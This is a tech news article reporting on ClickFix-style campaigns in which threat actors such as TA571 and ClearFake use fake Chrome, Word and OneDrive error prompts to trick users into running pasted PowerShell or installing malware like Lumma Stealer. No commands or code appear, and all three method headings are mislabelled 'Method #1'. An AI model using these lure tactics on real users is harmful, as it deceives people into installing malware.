Hackers Using Fake Chrome, Word, and OneDrive to Target Users

admin


  • Hackers are using fake Google Chrome, Microsoft Word, and OneDrive to install payloads across devices.
  • This trick is being used by multiple threat actors who are sending fake error messages over these apps and tricking users into downloading malware.
  • The worst part is Windows is still not able to detect or block these attacks. So until then, the danger persists.

Hackers Using Fake Chrome, Word, and OneDrive to Target Users

Hackers around the world are constantly coming up with new ways to trick users and this time they have created fake Google Chrome, Microsoft Word, and OneDrive. The worst part is this is not a single operation – multiple threat actors have been found using this trick.

  • For instance, TA571, the threat actor who is known for sending out bulk emails to trick users into downloading malware, was found using this method.
  • Similarly, threat actors behind ClearFake and a new attack cluster called ClickFix were also found to be a part of this malicious operation.

How Exactly Does It Work?

According to a report by Proofpoint, the payloads used in these attacks are NetSupport, Matanbuchus, Amadey Loader, DarkGate, XMRig, a clipboard hijacker, and Lumma Stealer.

Now speaking of the methodology, there are three ways in which these attacks are being carried out.

Method #1 – ClickFix Campaign

The first case is associated with the ‘ClickFix’ campaign.

  • Here, the threat actors send an error message to users through email or as website overlays and then convince them to download their browser’s latest update.
  • However, the link leads to fake updates which are then used to install malware onto a user’s device.

In some cases, the users are also asked to open “Windows PowerShell (Admin)” and paste a certain code provided by them. The end result is the same here as well.

Method #1 – Root Certificate

In the second case, the hackers sent a warning to the users, saying that there was some trouble displaying the webpage and they needed to install a “root certificate”.

To do this, the users were directed to copy a PowerShell script into the Windows Clipboard and run it in a Windows Admin console. This script would then display fake messages while silently downloading malware on the device that would steal their information.

Method #1 – Fake Email

In the third method, threat actors send emails that look like Microsoft Word document prompts and ask users to download something called “Word Online” – an extension that will apparently help the users view their documents correctly.

The error message also contained options like “How to fix” and “Auto-fix” which contain certain commands that apparently can fix the errors (whatever error has been displayed to the user), if pasted into PowerShell. But in reality, doing so will open up your system to malware.

How Effective Are These Tricks?

The biggest problem with these tricks is that Windows is still unable to detect and block them. So until then, users will constantly be vulnerable.

Also, although the attack methods require a great deal of social engineering, it is being done so cleverly that users actually believe there’s something wrong with their system that needs to be fixed. So in simple terms, they are pretty effective.

The Tech Report - Editorial ProcessOur Editorial Process

The Tech Report editorial policy is centered on providing helpful, accurate content that offers real value to our readers. We only work with experienced writers who have specific knowledge in the topics they cover, including latest developments in technology, online privacy, cryptocurrencies, software, and more. Our editorial policy ensures that each topic is researched and curated by our in-house editors. We maintain rigorous journalistic standards, and every article is 100% written by real authors.



Source link

Leave a comment